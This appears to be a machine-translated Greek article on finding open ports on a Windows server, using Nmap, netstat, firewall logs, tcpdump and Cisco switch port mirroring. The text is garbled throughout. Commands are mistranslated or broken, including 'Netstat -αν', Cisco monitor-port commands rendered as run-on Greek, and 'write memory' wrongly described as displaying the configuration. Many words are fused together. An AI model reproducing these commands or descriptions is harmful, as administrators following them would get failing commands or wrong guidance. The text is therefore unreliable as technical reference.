Μια εξωτερική σάρωση θύρας τείχους προστασίας μπορεί να εντοπίσει όλες τις υπηρεσίες που αποκρίνονται (όπως Web ή ΗΛΕΚΤΡΟΝΙΚΗ ΔΙΕΥΘΥΝΣΗ) φιλοξενείται σε εσωτερικούς διακομιστές. Αυτοί οι διακομιστές θα πρέπει επίσης να προστατεύονται. Διαμορφώστε έναν οικείο σαρωτή θύρας (για παράδειγμα, Network Mapper - Nmap) για έλεγχο η σωστή ομάδαΘύρες UDP ή TCP. Γενικά, οι σαρώσεις θυρών TCP είναι πιο αξιόπιστες από τις σαρώσεις UDP λόγω της βαθύτερης ανάδρασης από πρωτόκολλα TCP προσανατολισμένα στη σύνδεση. Το Nmap είναι διαθέσιμο σε εκδόσεις Windows και Unix. Είναι εύκολο να ξεκινήσετε τη βασική διαδικασία σάρωσης, αν και το πρόγραμμα έχει πολύ πιο περίπλοκες λειτουργίες. Για να βρω ανοιχτές θύρες στον δοκιμαστικό υπολογιστή, έτρεξα την εντολή

Nmap 192.168.0.161

Το σχήμα 1 δείχνει τα αποτελέσματα μιας συνεδρίας σάρωσης - σε αυτήν την περίπτωση Υπολογιστής με Windows 2003 σε τυπική διαμόρφωση... Τα δεδομένα που συλλέχθηκαν από τη σάρωση θύρας δείχνουν ότι υπάρχουν έξι ανοιχτές θύρες TCP.

Εικόνα 1: Μια βασική περίοδος σάρωσης Nmap
  • Η θύρα 135 χρησιμοποιείται από τη δυνατότητα αντιστοίχισης τελικού σημείου RPC πολλών τεχνολογιών των Windows - για παράδειγμα, εφαρμογές COM / DCOM, DFS, αρχεία καταγραφής συμβάντων, μηχανισμοί αναπαραγωγής αρχείων, ουρά μηνυμάτων και Microsoft Outlook... Αυτή η θύρα θα πρέπει να είναι μπλοκαρισμένη στο περιμετρικό τείχος προστασίας, αλλά είναι δύσκολο να κλείσει ενώ διατηρείται η λειτουργικότητα των Windows.
  • Η θύρα 139 χρησιμοποιείται από την υπηρεσία NetBIOS Session Service, η οποία καλεί το πρόγραμμα περιήγησης Εύρεση άλλων υπολογιστών, την υπηρεσία κοινής χρήσης αρχείων, τη σύνδεση δικτύου και την υπηρεσία διακομιστή. Είναι δύσκολο να κλείσει, όπως και η θύρα 135.
  • Η θύρα 445 χρησιμοποιείται από τα Windows για κοινή χρήση αρχείων. Για να κλείσετε αυτήν τη θύρα, πρέπει να αποκλείσετε την κοινή χρήση αρχείων και εκτυπωτών για δίκτυα Microsoft. Το κλείσιμο αυτής της θύρας δεν εμποδίζει τη σύνδεση του υπολογιστή με άλλους απομακρυσμένους πόρους. Ωστόσο, άλλοι υπολογιστές δεν θα μπορούν να συνδεθούν σε αυτό το σύστημα.
  • Οι θύρες 1025 και 1026 ανοίγουν δυναμικά και χρησιμοποιούνται από άλλους συστημικές διαδικασίες Windows, ιδίως με διάφορες υπηρεσίες.
  • Η θύρα 3389 χρησιμοποιείται από την Απομακρυσμένη επιφάνεια εργασίας, η οποία δεν είναι ενεργοποιημένη από προεπιλογή, αλλά είναι ενεργή στον δοκιμαστικό υπολογιστή μου. Για να κλείσετε τη θύρα, μεταβείτε στην καρτέλα Απομακρυσμένη στο πλαίσιο διαλόγου Ιδιότητες συστήματος και καταργήστε την επιλογή του πλαισίου ελέγχου Να επιτρέπεται στους χρήστες η απομακρυσμένη σύνδεση σε αυτόν τον υπολογιστή.

Φροντίστε να αναζητήσετε ανοιχτές θύρες UDP και να κλείσετε τις μη απαραίτητες. Το πρόγραμμα σάρωσης εμφανίζει τις ανοιχτές θύρες στον υπολογιστή που είναι ορατές από το δίκτυο. Παρόμοια αποτελέσματα μπορούν να ληφθούν χρησιμοποιώντας τα εργαλεία που βρίσκονται στο κεντρικό σύστημα.

Σάρωση κεντρικού υπολογιστή

Εκτός από τη χρήση ενός σαρωτή θύρας δικτύου, οι ανοιχτές θύρες στο κεντρικό σύστημα μπορούν να εντοπιστούν χρησιμοποιώντας την ακόλουθη εντολή (εκτελείται στο κεντρικό σύστημα):

Netstat -αν

Αυτή η εντολή λειτουργεί τόσο σε Windows όσο και σε UNIX. Το Netstat παραθέτει τις ενεργές θύρες στον υπολογιστή. Στα Windows 2003 Windows XP, προσθέστε την παράμετρο -o για να λάβετε το αντίστοιχο αναγνωριστικό προγράμματος (PID). Το σχήμα 2 δείχνει την έξοδο Netstat για τον ίδιο υπολογιστή που είχε προηγουμένως σαρωθεί για θύρες. Λάβετε υπόψη ότι πολλές θύρες που ήταν προηγουμένως ενεργές είναι κλειστές.

Έλεγχος καταγραφής τείχους προστασίας

Ενα ακόμα χρήσιμος τρόποςεντοπισμός εφαρμογών δικτύου που στέλνουν ή λαμβάνουν δεδομένα μέσω του δικτύου - συλλέξτε και αναλύστε περισσότερα δεδομένα στο αρχείο καταγραφής του τείχους προστασίας. Η άρνηση καταχωρίσεων που παραθέτουν πληροφορίες από την εξωτερική διεπαφή του τείχους προστασίας είναι απίθανο να είναι χρήσιμες λόγω της «θορυβώδους κυκλοφορίας» (π.χ. σκουλήκια, σαρωτές, δοκιμές ping) που φράζουν το Διαδίκτυο. Αλλά αν καταγράψετε τα επιτρεπόμενα πακέτα από την εσωτερική διεπαφή, μπορείτε να δείτε όλη την εισερχόμενη και εξερχόμενη κίνηση δικτύου.

Για να δείτε τα μη επεξεργασμένα δεδομένα κίνησης στο δίκτυο, μπορείτε να εγκαταστήσετε έναν αναλυτή δικτύου που συνδέεται στο δίκτυο και καταγράφει τυχόν πακέτα δικτύου που έχουν εντοπιστεί. Ο πιο ευρέως χρησιμοποιούμενος δωρεάν αναλυτής δικτύου είναι ο Tcpdump για UNIX (η έκδοση των Windows ονομάζεται Windump), ο οποίος είναι εύκολο να εγκατασταθεί στον υπολογιστή σας. Μετά την εγκατάσταση του προγράμματος, θα πρέπει να το ρυθμίσετε ώστε να λειτουργεί στη λήψη όλων πακέτα δικτύουγια να καταγράψετε όλη την κίνηση και, στη συνέχεια, συνδεθείτε σε μια οθόνη θύρας στον διακόπτη δικτύου και παρακολουθήστε όλη την κίνηση που διέρχεται από το δίκτυο. Οι ρυθμίσεις της οθόνης θύρας θα συζητηθούν παρακάτω. Το Tcpdump είναι ένα εξαιρετικά ευέλικτο πρόγραμμα που σας επιτρέπει να βλέπετε την κυκλοφορία δικτύου χρησιμοποιώντας εξειδικευμένα φίλτρα και να εμφανίζετε μόνο πληροφορίες σχετικά με τις διευθύνσεις IP και τις θύρες ή όλα τα πακέτα. Δύσκολη η προβολή απορριμμάτων δικτύου μεγάλα δίκτυαχωρίς τη βοήθεια κατάλληλων φίλτρων, αλλά θα πρέπει να ληφθεί μέριμνα ώστε να μην χαθούν σημαντικά δεδομένα.

Συνδυασμός εξαρτημάτων

Μέχρι στιγμής, έχουμε εξετάσει τις διάφορες μεθόδους και εργαλεία που μπορούν να χρησιμοποιηθούν για τον εντοπισμό εφαρμογών που χρησιμοποιούν το δίκτυο. Ήρθε η ώρα να τα συνδυάσετε και να σας δείξουμε πώς να αναγνωρίζετε ανοιχτές θύρες δικτύου. Είναι εκπληκτικό πόσο φλύαρες είναι οι υπολογιστές στο δίκτυο! Πρώτον, συνιστάται να εξοικειωθείτε με Έγγραφο της Microsoft"Επισκόπηση υπηρεσίας και απαιτήσεις θύρας δικτύου για το σύστημα Windows Server" ( http://support.microsoft.com/default.aspx?scid=kb;en-us;832017), το οποίο παραθέτει τα πρωτόκολλα (TCP και UDP) και τους αριθμούς θυρών που χρησιμοποιούνται από τις εφαρμογές και τις περισσότερες μεγάλες υπηρεσίες WindowsΥπηρέτης. Αυτό το έγγραφο περιγράφει αυτές τις υπηρεσίες και τις σχετικές θύρες δικτύου που χρησιμοποιούν. Συνιστάται η λήψη και η εκτύπωση αυτού που είναι χρήσιμο για τους διαχειριστές Δίκτυα Windowsοδηγός αναφοράς.

Διαμόρφωση αναλυτή δικτύου

Όπως αναφέρθηκε προηγουμένως, ένας τρόπος προσδιορισμού των θυρών που χρησιμοποιούνται από τις εφαρμογές είναι η χρήση ενός αναλυτή δικτύου για την παρακολούθηση της κυκλοφορίας μεταξύ των υπολογιστών. Για να δείτε όλη την κίνηση, πρέπει να συνδέσετε έναν αναλυτή δικτύου σε έναν διανομέα ή μια οθόνη θύρας στο διακόπτη. Κάθε θύρα σε έναν διανομέα βλέπει όλη την κίνηση κάθε υπολογιστή που είναι συνδεδεμένος σε αυτόν τον διανομέα, αλλά οι διανομείς είναι μια ξεπερασμένη τεχνολογία και οι περισσότερες εταιρείες τους αντικαθιστούν με διακόπτες που παρέχουν καλή απόδοση, αλλά δεν είναι βολικοί για ανάλυση: κάθε θύρα σε έναν διακόπτη δέχεται μόνο κίνηση που κατευθύνεται σε έναν υπολογιστή που είναι συνδεδεμένος σε αυτήν τη θύρα. Για να αναλύσετε ολόκληρο το δίκτυο, πρέπει να παρακολουθείτε την κίνηση που κατευθύνεται σε κάθε θύρα του μεταγωγέα.

Αυτό απαιτεί τη διαμόρφωση μιας οθόνης θύρας (διάφοροι προμηθευτές την αποκαλούν θύρα span ή mirrored port) στον διακόπτη. Η εγκατάσταση μιας οθόνης θύρας σε διακόπτη Cisco Catalyst από τη Cisco Systems είναι εύκολη. Πρέπει να εγγραφείτε στον διακόπτη και να ενεργοποιήσετε τη λειτουργία Ενεργοποίηση, στη συνέχεια να μεταβείτε στη ρύθμιση παραμέτρων της λειτουργίας τερματικού και να εισαγάγετε τον αριθμό διασύνδεσης της θύρας μεταγωγέα στην οποία πρέπει να αποστέλλεται όλη η παρακολουθούμενη κυκλοφορία. Τέλος, πρέπει να καθορίσετε όλες τις θύρες που παρακολουθούνται. Για παράδειγμα, οι ακόλουθες εντολές παρακολουθούν τρεις θύρες Fast Ethernet και προωθούν ένα αντίγραφο της κίνησης στη θύρα 24.

Διασύνδεση FastEthernet0 / Οθόνη 24 θυρών FastEthernet0 / Οθόνη 1 θύρας FastEthernet0 / Οθόνη 2 θυρών FastEthernet0 / 3 τέλος

V αυτό το παράδειγμαΈνας αναλυτής δικτύου που είναι συνδεδεμένος στη θύρα 24 θα προβάλλει όλη την εξερχόμενη και εισερχόμενη κίνηση από υπολογιστές που είναι συνδεδεμένοι στις τρεις πρώτες θύρες του μεταγωγέα. Για να δείτε τη διαμόρφωση που δημιουργήθηκε, πληκτρολογήστε την εντολή

Γράψτε μνήμη

Αρχική ανάλυση

Ας δούμε ένα παράδειγμα ανάλυσης δεδομένων που διέρχονται από ένα δίκτυο. Εάν χρησιμοποιείτε υπολογιστή Linux για ανάλυση δικτύου, μπορείτε να κατανοήσετε πλήρως τον τύπο και τη συχνότητα των πακέτων στο δίκτυο χρησιμοποιώντας λογισμικό όπως το IPTraf σε κατάσταση στατιστικής λειτουργίας. Μπορείτε να βρείτε λεπτομέρειες για την κυκλοφορία χρησιμοποιώντας το πρόγραμμα Tcpdump.